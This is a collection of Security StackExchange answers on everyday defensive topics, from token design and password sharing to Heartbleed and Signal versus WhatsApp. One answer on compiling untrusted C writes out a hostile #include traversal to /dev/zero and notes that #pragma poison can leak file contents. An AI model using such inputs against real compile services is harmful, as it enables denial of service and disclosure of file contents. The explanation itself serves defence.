intranet, or something else. Just don't fire up your IDE and start coding away. Update: Your use case This is one of the cases where an access token is probably a good idea. But to get around the problems mentioned above I would do this: Keep both the CAPTCHA and the rate limit by IP. (You might want to reconsider how the rate limiting is done in order to prevent accidental or deliberate DoS.) To deal with the brute forcing, I would increase the size of the token. Google Drive uses 49 characters with both upper case letters, lower case letters and numbers. That should be enough for you as well. To get around the sharing issue, print the URL with the token in a QR code on the document itself. This brings the whole problem into the domain of physical paper that people are used to dealing with. The people who see the paper will have access to the digital original. That is easy to grasp. Consider setting a limit on how many times the document can be accessed, or at least a maximum time for how long the token can be used. If the car should be registered within one week, there is no reason for the token to work after two. Do not store the tokens in plain text in your database. Hash them. (Something fast like SHA-256 should be enough here - no need to roll out bcrypt when you have large random tokens.) Use a CSPRNG to generate the tokens, otherwise they could be guessed by an attacker having access to a few tokens.
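To make the last two points concrete, here is a minimal Python sketch of generating and storing such tokens. The 49-character length is borrowed from the Google Drive comparison above, and the reduced alphabet (no look-alike characters) is just an assumption to make printed codes easier to type, not a requirement:

```python
import hashlib
import secrets

# Alphabet without look-alikes (0/O, 1/l/I) purely for readability of printed codes.
ALPHABET = "ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz23456789"

def new_token(length=49):
    # The secrets module uses the OS CSPRNG, unlike the random module.
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

def storable_hash(token):
    # With long random tokens a fast hash is fine; the stored value alone is useless to an attacker.
    return hashlib.sha256(token.encode("utf-8")).hexdigest()

token = new_token()              # embed this in the QR code / URL on the printed document
db_value = storable_hash(token)  # store this, together with an expiry date and access counter
```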
{ "source": [ "https://security.stackexchange.com/questions/137845", "https://security.stackexchange.com", "https://security.stackexchange.com/users/124355/" ] }
137,846
IT workers are usually trusted by their family members, who readily share passwords (Facebook, email, Twitter, you name it!) so they can get easy help setting whatever option they can't find, or an explanation of a confusing situation. I always try to convince them and explain why this is a bad practice and that I do not want to know their password. However, I usually fall short on arguments when I get answered "But I know I can trust you" or "I know that you will not use this for evil acts", to which I can't really reply "You don't know", as it would imply they can't trust me (remember, they are family members). What list of arguments (the longer, the better) do you use to explain the risks of such a bad practice? Here is my own small list: That's a bad practice and you should not trust anyone with your password. That's not respectful towards the people sharing intimacy with you (you gave me your Facebook password, so I now have access to all the very personal details of people that trust you and not me). That's a responsibility I do not want you to force on me. If I use this password carelessly (i.e., without checking over my shoulder) someone can read this password and I would be the one that leaked it. Most of them usually don't understand, become suspicious or just assume that we are paranoid. Please, avoid cases where harm is done using passwords. While this is mostly funny or creative, it does not answer my question, where the people trust you and that trust must be kept as is. Note though, that the comments stating you didn't realize they'd find what you did a problem or changing the password to a secure one and sending the password reset link are somehow valid in a way ;)
The nice and educational way This is a bit similar to your third bullet point. Nobody else should know your password, not even people you trust. That is the only way you can be sure only you have access to your account. Let's say you give me your Facebook password and a week later rumors start spreading about what you did in Las Vegas last year. Only a few people you trust knows that, and well, potentially me since I have your Facebook password. If that happens, I do not want to be a suspect. I do not want to be in a position where every privacy-related incident that happens to you could have been because of me. Giving information they should not have to people you trust can end up destroying that trust instead of reinforcing it. If countered with "but I really do trust you completely", highlight that the person also completely trusts Eve and Mark, the only two persons in the world who know about the Vegas incident, and if the word gets out clearly someone trusted must have broken the trust. A key message is this: I do not want to be party to all your secrets. If need be, make up a white lie about a friend of yours who got in trouble in a similar scenario to make it more concrete. The not so nice and educational way To teach people not to share their password, I post all passwords people give to me on Twitter. No exceptions. If you give me your Facebook password, within five minutes it will be on Twitter together with your username. [Open up Twitter and get ready to type.] If you still want to give it to me, that is fine, but you have been warned. This is probably not a good idea since you should not make threats you are not prepared to deliver on, and you should not deliver on this threat. But sometimes I am tempted... Reversing the roles Sometimes it is easier to understand someone else's position if you reverse the roles. Give the person a sealed envelope and say this: This envelope contains a piece of information that would completely ruin my career, my marriage, my life if it ever came out. You must hold on to this envelope forever, and make sure that nobody - including you - ever see what is inside. But don't worry, I trust you completely. When they refuse to take the envelope, explain that you don't want their Facebook password either.
{ "source": [ "https://security.stackexchange.com/questions/137846", "https://security.stackexchange.com", "https://security.stackexchange.com/users/125577/" ] }
138,305
Is it safe to display the detailed query in the error webpage with the below details? **INSERT statement conflicted with the FOREIGN KEY constraint "ABC". The conflict occurred in database ** The statement has been terminated.[INSERT INTO ** ] ** I know that showing this kind of error will help penetration testers and hackers, but I need someone to shed light on this. How can this information be used for SQL injection or similar attacks? Or is it okay to display such sensitive information?
End users should never get to see the gory details of your environment. Instead it is more professional to show a generic 'Sorry, something went wrong' page. At least visitors can see that you have a real error handling mechanism present on your website. However, those errors should be written to a server-side error log (the application or database log) and should also trigger a notification by e-mail or otherwise to the IT team. Those errors should not happen in normal operation, so they can be a sign that your site is failing or is possibly under attack.
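As a rough illustration of that separation (generic page for the visitor, full details for the log plus a notification hook), a minimal Python/Flask-style sketch could look like the following; the notification function is a placeholder, not part of any particular framework:

```python
import logging
from flask import Flask

app = Flask(__name__)
logging.basicConfig(filename="app-errors.log", level=logging.ERROR)

@app.errorhandler(Exception)
def handle_error(exc):
    # Full details (query, constraint name, stack trace) go to the server-side log only.
    app.logger.exception("Unhandled error: %s", exc)
    # notify_it_team(exc)  # placeholder for an e-mail/chat alert to the IT team
    # The visitor only ever sees a generic message.
    return "Sorry, something went wrong.", 500
```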
{ "source": [ "https://security.stackexchange.com/questions/138305", "https://security.stackexchange.com", "https://security.stackexchange.com/users/34735/" ] }
138,438
In my home I have a router protected with WPA2-PSK (WPA2 Personal), using the passphrase. When I try to log in to a page over the Internet (this page does not use HTTPS to log me in), all my data is sent in clear text (since I can see the password I typed in Wireshark). Why is that? I mean, my WiFi is protected, so all the communication should be encrypted, right?
I mean, my WiFi is protected, so all the communication should be encrypted, right? It is, but not at the place you're reading it. Encryption happens at a certain point in the "pipeline", and decryption then must also happen at a certain point in the "pipeline" (otherwise the data are useless). You are observing the data after they have been decrypted, which would not be possible if you were using HTTPS (which instead provides end-to-end encryption, which starts at the server and ends at the browser). If you attempted to use Wireshark to capture the contents of an HTTPS transaction, it'd be like this: +--------+ (encrypted) +----------+ (encrypted) +--------+ | Server | ----------->| Internet |------------>| Router | +--------+ +----------+ +--------+ | | (encrypted) +------------------+---+ | Your PC | | | +-----------+ (e)| | | | Browser |<---+ | | +-----------+ | | | +-----------+ (e)| | | | Wireshark |<---/ | | +-----------+ | +----------------------+ Here, your browser knows how to decrypt the data, because it "owns" the HTTPS transaction in the first place; your Wireshark instance (which, per the very purpose of end-to-end encryption, is treated just like any other snooper in this scenario) does not. But your wireless encryption starts at the router and ends at the PC's network card, so the result for you is more like this: +--------+ (plaintext) +----------+ (plaintext) +--------+ | Server | ----------->| Internet |------------>| Router | +--------+ +----------+ +--------+ | | (encrypted) +------------------+---+ | Your PC | | | +-----------+ (p)| | | | Browser |<---+ | | +-----------+ | | | +-----------+ (p)| | | | Wireshark |<---/ | | +-----------+ | +----------------------+ Here, anything on your PC can read the data, because they were decrypted by your network card. Otherwise, what application would decrypt the data? Nothing would work. There is almost no relationship between HTTPS and WPA2-PSK; they do completely different jobs.
{ "source": [ "https://security.stackexchange.com/questions/138438", "https://security.stackexchange.com", "https://security.stackexchange.com/users/126091/" ] }
138,606
This is an attempt to ask a canonical question as discussed in this old meta post . The goal is to create something helpful that can be used as a duplicate when non experts ask about virus infections. Let's say that I have determined beyond doubt that my home PC is infected by a virus. If necessary, you can assume that my computer runs Windows. Answers aimed at the non-technical reader are encouraged. What do I do now? How do I get rid of the virus? Do I really need to do a full reinstall? Can't I just run a couple of anti-virus programs, delete some registry keys, and call it a day? I really don't have time to deal with this right now. Is it dangerous to keep using the computer while it is infected? I don't have backups of my family photos or my master thesis from before the infection occurred. Is it safe to restore backups made after the infection occurred? Do I need to worry about peripherals getting infected? Do I need to do anything about my router or other devices on my home network?
What do I do now? How do I get rid of the virus? The best option is what is referred to as " nuke it from orbit ." The reference is from Aliens : The idea behind this is that you wipe your hard drive and reinstall your OS. Before you do this, you should make sure you have the following: A way to boot your computer off installation media. This can be in the form of the Install CD that came with your computer, or a DVD you burnt from an ISO file (Windows can be downloaded legally here ). Some computers do not have CD-ROM drives anymore. Microsoft provides a tool to convert their ISO files to bootable thumb drives . Do not create the install media on the infected computer. Your Original Windows License Key. This can either be on a sticker on the side of your computer or you can recover it from your computer a program like The Magical Jelly Bean Keyfinder (which might contain malware, but it really doesn't matter because you are wiping it all after you get the key anyway). Or an official tool supplied with Windows called slmgr.vbs . Drivers. If you don't have a second computer, you are really going to want to have at the minimum video drivers & network card drivers. Everything else can be obtained online after you reinstall. Any files you want to save. You can back them up to a thumb drive for now, and scan them before putting them on your freshly installed machine (see below). Do I really need to do a full reinstall? Can't I just run a couple of virus programs, delete some registry keys, and call it a day? In theory, it is not always necessary to fully reinstall. In some cases you can clean the virus off the hard drive without a full reinstall. However, in practice it's very hard to know that you have gotten it all, and if you have one virus it is likely you have more. You might succeed in removing the one that causes symptoms (such as ugly ad popups), but the rootkit stealing your password and credit card numbers might go unnoticed. The only way to kill everything is to wipe the hard drive, so your best option is always to nuke it from orbit. It's the only way to be sure. I really don't have time to deal with this right now. Is it dangerous to keep using the computer while it is infected? You may not have time for it right now, but you really don't have time for your email getting hacked and your identity being stolen. It's best to take the time to fix it now and fix it right before the problem gets worse. While your computer is infected all your keystrokes might be recorded, your files stolen, it might even be used as a part of a botnet attacking other computers. You do not want this to be going on for longer than necessary. If you really don't have time to deal with it right now, power down the computer and use another one until you have time to fix it. (Be careful with file transfers from the infected to the uninfected computer, though, so you do not contaminate it.) I don't have backups of my family photos or my master thesis from before the infection occurred. Is it safe to restore backups made after the infection occurred? Any backups made after the virus infection occured could potentially be infected. A lot of the times they are not, but they could be. Since it is very hard to pinpoint exactly when the infection occured (it may be before you started to notice symptoms) this applies to all backups. Also, Windows restore points can be corrupted by a virus. It is better to archive copies of your personal files on external or cloud storage. 
If you are restoring them from external or cloud storage on a computer that has already been nuked from orbit, make sure you scan all the files you are restoring before you open them. Executable files (such as .exe) can contain viruses, and so can Office documents. However, picture and movie files are likely safe in most cases. Do I need to worry about peripherals getting infected? Do I need to do anything about my router or other devices on my home network? Peripherals can be infected. Once you have re-installed your OS you should copy all the files off your thumb drive, scan them with antivirus, format the thumb drive, and restore the files to the thumb drive as needed. Most routers will be fine; however, it is possible for DNS settings to be compromised either through a weak password or malicious use of UPnP. This can easily be resolved by resetting the router to factory defaults. You may also want to configure your DNS settings to either Google DNS or OpenDNS. If you have some type of network attached storage, you should do a full scan of it with antivirus before using any of the files on it. See Also: Help! My information has been stolen! What do I do now?
{ "source": [ "https://security.stackexchange.com/questions/138606", "https://security.stackexchange.com", "https://security.stackexchange.com/users/98538/" ] }
138,858
I'm working for a business that deals with web application development, and I am the "Security Expert". I recently implemented HTTPS in an application with Let's Encrypt , and my boss is asking me to prove that HTTPS really encrypts the information. How can I do that?
My boss is asking me to prove that HTTPS really encrypts the information. How can I do that? On a basic level, you can use a packet inspector or a simple port forwarding proxy. Perhaps Wireshark will inspect the packets easily enough. You should quickly be able to find that the HTTP traffic is plain text, while the HTTPS is binary gibberish (with the exception of the hostname). However, this only proves that the connection is obfuscated. It does not prove encryption or security. Specifically it does nothing to show immunity to MiTM. Fortunately, the browser does all this for you. If a modern browser tries to connect to an HTTPS web page, it will verify the following: Strong enough hash algorithms for the certificates involved. Strong enough encryption algorithms (i.e. it is actually encrypted). Certificate chain issued by a trusted Certificate Authority (i.e. a CA who verifies domain ownership prior to issuing their certificates). Non-expiry of the certificates. A certificate chain that validates and matches the hostname means a man-in-the-middle cannot silently intercept the connection. While your boss may like to see the Wireshark gibberish comparing HTTP to HTTPS, a stronger test is to quite simply visit the HTTPS site with a modern browser. Be sure the browser has not been pre-configured to ignore the warning (i.e. test from multiple computers and smartphones). If you plan to continue HTTPS permanently (which you should), a wise precaution would be to force redirect all HTTP visits to the HTTPS site, because you cannot guarantee that all visitors will include the https:// prefix when visiting your site.
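If a command-line demonstration helps alongside Wireshark, a small Python sketch (the hostname is a placeholder for your own site) can show the same checks happening outside the browser: the default SSL context verifies the certificate chain, hostname and validity dates, and printing the negotiated protocol and cipher shows the traffic really is encrypted:

```python
import socket
import ssl

host = "example.com"  # replace with your own HTTPS site
context = ssl.create_default_context()  # verifies certificate chain, hostname and expiry

with socket.create_connection((host, 443)) as sock:
    with context.wrap_socket(sock, server_hostname=host) as tls:
        print("Protocol:", tls.version())   # e.g. TLSv1.3
        print("Cipher:  ", tls.cipher())    # (name, protocol version, secret bits)
        print("Issuer:  ", tls.getpeercert()["issuer"])
```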
{ "source": [ "https://security.stackexchange.com/questions/138858", "https://security.stackexchange.com", "https://security.stackexchange.com/users/124960/" ] }
138,881
I have a small server and I would like to check compile times on C programs provided by users. The programs would never be run, only compiled. What risks are there in allowing users to compile arbitrary C using gcc 5.4.0?
A bit of a weird one, but: it's a denial-of-service risk, or potential information disclosure. Because C's preprocessor will cheerfully include any file specified in an #include directive, somebody can #include "../../../../../../../../../../dev/zero" and the preprocessor will try to read to the end of /dev/zero (good luck). Similarly, especially if you let people see the output of their compilation attempts, somebody could try including various files that may or may not be present on your system, and could learn things about your machine. Combined with clever usage of #pragma poison , they might even learn things about the file contents even if you don't provide full error messages. Relatedly, pragmas can alter a lot of preprocessor, compiler, or linker behavior, and are specified in source files. There's probably no pragma that lets somebody specify the output file name, but if there is, it could be abused to overwrite sensitive files, or get itself executed (by writing into cron or similar). There might be something similarly dangerous. You really should be careful about compiling untrusted code.
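If you do go ahead, it seems wise to at least cap resource use and keep compiler output away from users. The Python sketch below, timing a gcc run under limits, is only a rough illustration: the specific limits and flags are assumptions, and a container or chroot would still be a better sandbox.

```python
import resource
import subprocess
import time

def child_limits():
    # Applied inside the child process before gcc starts (POSIX only).
    resource.setrlimit(resource.RLIMIT_CPU, (10, 10))                    # CPU seconds
    resource.setrlimit(resource.RLIMIT_FSIZE, (1_000_000, 1_000_000))    # max bytes any output file may reach
    resource.setrlimit(resource.RLIMIT_AS, (512 * 2**20, 512 * 2**20))   # address space

def timed_compile(source_path):
    start = time.monotonic()
    subprocess.run(
        ["gcc", "-c", "-o", "/dev/null", source_path],  # compile only, discard the object file
        preexec_fn=child_limits,
        timeout=30,            # wall-clock cap in case gcc blocks on something like /dev/zero
        capture_output=True,   # never echo compiler errors (and thus file contents) back to users
        check=False,
    )
    return time.monotonic() - start
```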
{ "source": [ "https://security.stackexchange.com/questions/138881", "https://security.stackexchange.com", "https://security.stackexchange.com/users/126570/" ] }
138,957
I work with civil rights for children and youth and am trying to create a website for LGBT youth and children and their families. The website needs to be safe as it is still very dangerous in many countries to admit to being gay (or LGBTQ). I have a series of short children's films that I would like to make accessible for free on a website but the youth, families and teachers who access the site need to be untraceable. Can I make a website where the security lies within the website? People and kids coming to the site will not be setting up their own security measures to not be traced.
Don't do it If you are targeting unsafe regimes, the consequences can be severe. For example, in Iran, condemned homosexuals are usually sentenced to death by hanging. It would only take the slightest lapse on the part of your site, or one of your users for this to be incriminating evidence. Can you imagine the guilt you would feel that your well-intentioned site ended up being evidence that led to an execution? To operate online subversively in a repressive regime takes extreme skill and caution. Simply using Tor would be a red flag in itself. While hacker groups like anonymous may be able to get away with this, normal users cannot. There have been comments on other answers saying (roughly) "use HTTPS, it's fine". I cannot stress strongly enough how that is dangerous advice. HTTPS reveals the domain name the user is accessing, it leaves trace on the client computer, and it's likely that nation-states (including Iran) can produce fake certificates and intercept all HTTPS traffic.
{ "source": [ "https://security.stackexchange.com/questions/138957", "https://security.stackexchange.com", "https://security.stackexchange.com/users/126642/" ] }
138,996
An NHS doctor I know recently had to do their online mandatory training questionnaire, which asks a bunch of questions about clinical practice, safety and security. This same questionnaire will have been sent to all the doctors in this NHS trust. The questionnaire included the following question: Which of the following would make the most secure password? Select one: a. 6 letters including lower and upper case. b. 10 letters a mixture of upper and lower case. c. 7 characters that include a mixture of numbers, letters and special characters. d. 10 letters all upper case. e. 5 letters all in lower case. They answered "b", and they lost a mark, as the "correct answer" was apparently "c". It is my understanding that as a rule, extending password length adds more entropy than expanding the alphabet. I suppose the NHS might argue that people normally form long passwords out of very predictable words, making them easy to guess. But if you force people to introduce "special characters" they also tend to use them in very predictable ways that password guessing algorithms have no trouble with. Although full disclosure, I'm not a password expert - I mostly got this impression from Randall Munroe (click for discussion): Am I wrong?
By any measure, they're wrong: Seven random printable ASCII: 95 7 = 69 833 729 609 375 possible passwords. Ten random alphabetics: 52 10 = 144 555 105 949 057 024 possible passwords, or over 2000 times as many. Length counts. If you're generating your passwords randomly, it counts for far more than any other method of making them hard to guess.
{ "source": [ "https://security.stackexchange.com/questions/138996", "https://security.stackexchange.com", "https://security.stackexchange.com/users/31160/" ] }
139,182
I've been watching Defcon videos recently (in no way am I a hacker myself) and saw a video of someone demonstrating a security camera hack. For this hack you needed to know the IP address of the camera but there is no obvious way on how to do it. With devices like Phones and Computers it's easy to get the IP but it seems to be a little harder with other devices.
Connecting 'things' to the Internet is becoming common because of the benefits of remote communication. You can have your camera upload its footage to a cloud storage server, or be able to view the camera remotely, for instance. Any device on the Internet is exposed and subject to network mapping. The entire Internet is constantly being scanned, and once an IP is identified, there are processes that attempt to determine what the IP is connected to (web server, camera, fridge, your dog, etc.) From there, attackers (or researchers) can probe those devices for weaknesses and vulnerabilities (or default passwords). To help out the attackers and researchers, databases of these IP-to-thing mappings are maintained (Shodan, for instance). Then it is trivial to simply search for "security camera Acme Security model xyz123" and apply a specific hack (as you witnessed).
{ "source": [ "https://security.stackexchange.com/questions/139182", "https://security.stackexchange.com", "https://security.stackexchange.com/users/126881/" ] }
139,221
Most sites & software seem to have a default of auto lock or time lock after 3 wrong tries. I feel that the number could be much higher - not allowing retries is mainly to prevent automated brute force attacks, I think. The likelihood of a brute force attack getting the password right in 4 retries is almost the same as getting it in 3 retries - i.e. very very small. I think this can be kept much higher without compromising security. I know there are other strategies like increasing time to retry after each retry - but I am asking about a simple strategy like locking after "n" attempts - what's a good maximum "n"?
Unless you have separate means of restricting access to the login form itself, a good baseline is don't have a hard limit . That's because it's way too easy for someone to be completely locked out of their account. This is bad because of the denial of service, obviously, but it's also a security concern in itself. It will increase support requests from people asking for their accounts to be unlocked, and the people doing the unlocking will become habituated, and social engineering attacks starting with "hey, my account is locked" become that much easier. Instead, extend timeouts — but not infinitely; just enough to restrict the number of guesses to a reasonable amount over time given your password complexity requirements.
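One concrete way to read "extend timeouts" is a per-account delay that grows with consecutive failures instead of a hard lock. The following is a minimal in-memory sketch, purely illustrative; a real system would persist this state and probably combine it with per-IP limits:

```python
import time

MAX_DELAY = 15 * 60  # cap the forced wait at 15 minutes (an assumption, not a recommendation)
failures = {}        # username -> consecutive failed attempts
last_attempt = {}    # username -> timestamp of the last attempt

def seconds_until_next_try(user):
    # 0, 1, 2, 4, 8, ... seconds after each failure, capped; never a permanent lock.
    n = failures.get(user, 0)
    delay = min(2 ** (n - 1), MAX_DELAY) if n else 0
    elapsed = time.monotonic() - last_attempt.get(user, 0.0)
    return max(0.0, delay - elapsed)

def record_attempt(user, success):
    last_attempt[user] = time.monotonic()
    failures[user] = 0 if success else failures.get(user, 0) + 1
```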
{ "source": [ "https://security.stackexchange.com/questions/139221", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20195/" ] }
139,347
First and foremost, this is my very first experience with Code Signing. I bought Standard Code Signing from Certum for 3 years. I intend to publish applications in Czech republic mostly. But to the point, on Windows 10, when I download the signed executable, I get bumped by Smart-Screen filter which blocks the application. I don't know what to think. I used SHA256 and a time stamp. I signed it on Windows 8.1 fully updated. Here is a code snippet I used to sign the EXE file: SignTool sign /fd SHA256 /a /tr http://time.certum.pl "Barvy.exe" Did I do something wrong? Here is a picture detail of the signature of the EXE file:
Applications that are signed with a standard code signing certificate need to have a positive reputation in order to pass the SmartScreen filter. Microsoft establishes the reputation of an executable based upon the number of installations worldwide of the same application. Since you haven't published your application yet (and therefore the reputation hasn't been established yet), SmartScreen will continue to flag the application. There are two solutions: either wait until the application has a large user base and its reputation is adjusted by SmartScreen. However, in the meantime the warning might prevent users from installing and trusting the application. The second option is to sign it with an EV (Extended Validation) code signing certificate. Applications signed with an EV certificate establish their reputation right away. To quote Microsoft: Programs signed by an EV code signing certificate can immediately establish reputation with SmartScreen reputation services even if no prior reputation exists for that file or publisher. You can find further details at the Microsoft SmartScreen & Extended Validation (EV) Code Signing Certificates blogpost.
{ "source": [ "https://security.stackexchange.com/questions/139347", "https://security.stackexchange.com", "https://security.stackexchange.com/users/82570/" ] }
139,364
I have read about the Heartbleed OpenSSL vulnerability and understand the concept. However what I don't understand is the part where we pass 64k as the length and the server returns 64kb of random data because it does not check whether we really passed 64kb of echo message or 1 byte. But how is it even possible for a process on a server to return 64kb of random data from the RAM? Isn't the operating system supposed to prevent access to the real RAM and only allow access to virtual memory where one process cannot access the memory contents of other processes? Does OpenSSL run in kernel mode and thus has access to all the RAM? I would expect a segmentation fault if a process tried to access any memory that it didn't explicitly allocate. I can understand getting 64kb of random data from the process which is running the OpenSSL program itself but I don't see how it can even see the complete RAM of the server to be able to send it back to the client. UPDATE: @paj28's comment, yes it was precisely the false information that led me to wonder about this. As you said, even the official heartbleed.com advisory phrases it in a misleading way (although I would say they did so because it's intended for a much wider audience than just us technical folks and they wanted to keep it simple) For reference, here is how heartbleed.com states it(emphasis mine): The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. For any technical person that would imply the complete RAM of the virtual/physical machine.
@paj28's comment covers the main point. OpenSSL is a shared library, so it executes in the same user-mode address space as the process using it. It can't see other process' memory at all; anything that suggested otherwise was wrong. However, the memory being used by OpenSSL - the stuff probably near the buffer that Heartbleed over-reads from - is full of sensitive data. Specifically, it's likely to contain both the ciphertext and the plaintext of any recent or forthcoming transmissions. If you attack a server, this means you'll see messages sent to the server by others, and server responses to those messages. That's a good way to steal session tokens and private information, and you'll probably catch somebody's login credentials too. Other data stored by OpenSSL includes symmetric encryption keys (used for bulk data encryption and integrity via TLS) and private keys (used to prove identity of the server). An attacker who steals those can eavesdrop on (and even modify) the compromised TLS communication in realtime, or successfully impersonate the server, respectively (assuming a man-in-the-middle position on the network). Now, there is one weird thing about Heartbleed that makes it worse than you might expect. Normally, there'd be a pretty good chance that if you try and read 64k of data starting from an arbitrary heap address within a process, you'd run into an unallocated memory address (virtual memory not backed by anything and therefore unusable) pretty quickly. These holes in a process address space are pretty common, because when a process frees memory that it no longer needs, the OS reclaims that memory so other processes can use it. Unless your program is leaking memory like a sieve, there usually isn't that much data in memory other than what is currently being used. Attempting to read unallocated memory (for example, attempting to access memory that has been freed) causes a read access violation (on Windows) / segmentation fault (on *nix), which will make a program crash (and it crashes before it can do anything like send data back). That's still exploitable (as a denial-of-service attack), but it's not nearly as bad as letting the attacker get all that data. With Heartbleed, the process was almost never crashing. It turns out that OpenSSL, apparently deciding that the platform memory management libraries were too slow (or something; I'm not going to try to justify this decision), pre-allocates a large amount of memory and then uses its own memory management functions within that. This means a few things: When OpenSSL "frees" memory, it doesn't actually get freed as far as the OS is concerned, so that memory remains usable by the process. OpenSSL's internal memory manager might think the memory is not allocated, but as far as the OS is concerned, the OpenSSL-using process still owns that memory. When OpenSSL "frees" memory, unless it explicitly wipes the data out before calling its free function, that memory retains whatever values it had before being "freed". This means a lot of data that isn't actually still in use can be read. The memory heap used by OpenSSL is contiguous; there's no gaps within it as far as the OS is concerned. It's therefore very unlikely that the buffer over-read will run into a non-allocated page, so it's not likely to crash. OpenSSL's memory use has very high locality - that is, it's concentrated within a relatively small range of addresses (the pre-allocated block) - rather than being spread across the address space at the whim of the OS memory allocator. 
As such, reading 64KB of memory (which isn't very much, even next to a 32-bit process' typical 2GB range, much less the enormous range of a 64-bit process) is likely to get a lot of data that is currently (or was recently) in use, even though that data resides in the result of a bunch of supposedly-separate allocations.
{ "source": [ "https://security.stackexchange.com/questions/139364", "https://security.stackexchange.com", "https://security.stackexchange.com/users/127063/" ] }
139,437
Hackers are smart. Could they hack a self-driving car through its CD drive? From what I understand, malicious code could be uploaded to the driverless car via CD which could give them access to brakes, windscreen wipers, sensors, etc. (all of which could be used to potentially commit murder or hold the car ransom).
Not on a well-designed car The CD player is part of the media system. It's likely that the media system has a number of security vulnerabilities, and a malicious CD can probably take control of the media system. It would be difficult to fix this without either greatly increasing the cost, or restricting the functionality of this. The car control systems - the CAN bus - should be strongly separated from the media systems. In previous attacks, like Jeep hacking , attackers have been able to break across from the media system to the CAN bus. However, this represents poor design and implementation. The two systems should be kept separate - or at least, have a highly restricted interface - and it is possible to do that at reasonable cost. Whether any future driverless cars will be well designed remains to be seen.
{ "source": [ "https://security.stackexchange.com/questions/139437", "https://security.stackexchange.com", "https://security.stackexchange.com/users/126881/" ] }
139,493
WhatsApp has "recently" deployed end-to-end encryption using the Signal protocol, which is of course also being used by Signal itself. The related white paper (PDF). Now this raises the question: Is there still any security benefit to use Signal over the much more widely deployed WhatsApp, now that both have good end-to-end encryption? The threat model in this case includes basically anyone not having access to the phones at the ends. It especially includes the service provider and law enforcement.
There are still a couple of security functions, which may matter to you, which Signal does better than WhatsApp. Client-Side Fanout When you use a group chat in WhatsApp, you send your message to the server who in turn distributes it to all the group members. This way WhatsApp learns all the social structures and can in theory perform traffic analysis to deduce quite a bit of information from the message volume exchanged. In Signal on the other hand, group chats are actually normal peer-to-peer chats 1 with a special flag, which is set inside the end-to-end encrypted frame. So this way OpenWhisperSystems (the makers of Signal) doesn't learn your social group structures. However they can still see that three messages are going to three different people at once and can guess that this is due to a group chat. The blog post for Signal. The server-side fan-out is stated in the white paper (PDF) . Private Group Metadata Because the previously mentioned approach of everyone just directly sending the group messages to each other is messy with regards to privileges - as achieving consensus in an asynchronous distributed system is hard - Signal has deployed a new system to enforce access control and privileges in groups without learning anything about the group structure - only about the existence of a group and a guesstimate of its size based on the size of the server-stored ciphertext. See this blog post for details and this post for the deployment announcement and this post for how group links factor into this . I was unable to find documentation on how WhatsApp handles this data. Though given they know the group membership to distribute messages, they may just store this in the clear. In-App Encryption Signal offers to encrypt the past communication at app level requiring a password to read past messages , which WhatsApp lacks completely. Obviously this can protect your messages in case of theft however you probably won't gain that much security because most people will probably not choose good passwords here for usability reasons. Use of the OS keystore Modern mobile operating systems provide a place for you to store your keys so they aren't unencrypted in the filesystem. The OS will usually either encrypt them with some hardware backed mechanisms, like iOS's secure enclave or Android will use things like ARM TrustZone for increased difficulty of key extraction. Additionally Apple is famously known for doing a really good job at the security of the iOS keychain backups. Signal uses these security features ( iOS , Android ), whereas WhatsApp (likely) does not . Optional Read and Typing notifications WhatsApp notifies you when somebody is typing and it notifies you when somebody read your message - and you can't turn it off for group chats. This however allows WhatsApp to deduce app usage behavior and your habits. Like "Do you check your WhatsApp messages at 1am?", combine that with the other meta data WhatsApp is harvesting and you can make some useful guesses about people's lifes. Additionally the "typing" notifications can be used to deduce potential contents based on context and default keyboard suggestions and other factors. Signal doesn't enforce this. Here's the original discussion on it on GitHub . As a more recent development, Signal adopted read notifications, but they're default-off (for pre-existing installations) and aren't forced-on in Group conversations. 
For groups I think they work individually with each member, that is, if a member and the sender both have them enabled, the sender will get the notification, which is much more privacy-focused than WhatsApp's solution. Backup Security WhatsApp offers to back up your messages so you can recover them when your phone is inaccessible or destroyed. However due to the very nature of this, the backup (which must (also) be hosted on Google Drive) cannot be encrypted / secured other than with your username / password for that account (which WhatsApp doesn't know). So as soon as that Google Drive account is breached or some government demands access, all the end-to-end security is gone if either party of the communication had backups enabled. As for iCloud (as opposed to Google Drive) a similar argument applies - especially as the kind of data WhatsApp is saving is not sensitive enough for Apple to use their stronger security mechanisms as they would e.g. for passwords. Even though the backup feature of Signal isn't as convenient as the one of WhatsApp, it doesn't automatically store (plaintext?) copies of messages on Google servers, but rather allows you to (automatically) create a local (encrypted) file and push this one around manually. It is unclear though whether WhatsApp's backup feature benefits from the recent security enhancements in Google's backup infrastructure (on Android at least), so they might actually be secure. Auto-deleting Messages Automatically deleting your own old messages is good from a security standpoint. It means that if an attacker manages to break into your phone / backup, they can't access all messages but only the recent ones. Auto-deletion is especially nice if you consider that you won't read all the really old messages anyway and that it will save you some storage. As of now, WhatsApp does not implement this. Signal on the other hand does. No meta-data storage Signal was recently hit by a subpoena. They complied (of course) but could only contribute very little, which confirms that they're holding true to their privacy policy. At the same time WhatsApp is sitting on a large(r) amount of meta data and would be much more useful if hit (and if it's being disclosed). This is especially obvious if you compare what WhatsApp logs and what Signal logs. Private Contact Discovery WhatsApp uploads your entire address book to their servers to compare which of the listed users have WhatsApp accounts. Obviously during that process WhatsApp learns your social graph, that is, who you know, including people who don't use WhatsApp. Signal on the other hand has somewhat recently deployed a much smarter solution, using fancy modern cryptographic techniques paired with Intel's SGX technology, so that OpenWhisperSystems actually doesn't learn your address book (only the SGX enclave does and that doesn't leak it), but only needs to keep on record who their users are; thus they also don't learn anything about which users you may know but don't chat with using Signal, or which people you know who don't use Signal (yet). The details of this can be read in their blog post. Registration Locking While both Signal and WhatsApp support registration locking, which forces you to enter a pre-determined PIN whenever a new device is added to an account, it is unclear how security is enforced. That is, how many tries one gets for the PIN before hitting the lock-out and whether this lock-out can be overridden by the service operator.
